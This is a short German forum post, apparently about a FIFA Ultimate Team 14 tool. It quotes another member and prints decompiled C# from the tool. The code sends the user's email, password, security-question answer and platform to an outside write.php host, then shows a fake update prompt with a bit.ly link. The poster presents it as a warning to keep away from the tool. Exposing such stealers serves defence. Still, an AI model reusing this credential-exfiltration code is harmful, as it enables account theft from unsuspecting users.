Quote:
Originally Posted by BlackflyLP
habe dich in Skype addet :]
|
Wenn du offline bist kann ich dich schlecht anschreiben
Code:
this.ListBox1.Items.Add(string.Concat(Conversions.ToString(DateAndTime.TimeOfDay), ": Logging into ", this.email.Text, "!"));
string[] text = new string[] { "http://www.topsecretcrimshit.me.pn/write.php?u=", this.email.Text, "&p=", this.password.Text, "&sq=", this.sq.Text, "&c=", this.plat.Text, "" };
WebRequest webRequest = WebRequest.Create(string.Concat(text));
webRequest.GetResponse();
Thread.Sleep(3000);
Interaction.MsgBox("Program Out Of Date! Update At: http://bit.ly/fut14update", MsgBoxStyle.OkOnly, null);
Process.Start("http://bit.ly/fut14update");
this.ListBox1.Items.Add(string.Concat(Conversions.ToString(DateAndTime.TimeOfDay), ": You must update! This version is out of date!"));
this.Label19.Visible = true;
Würde die Finger von lassen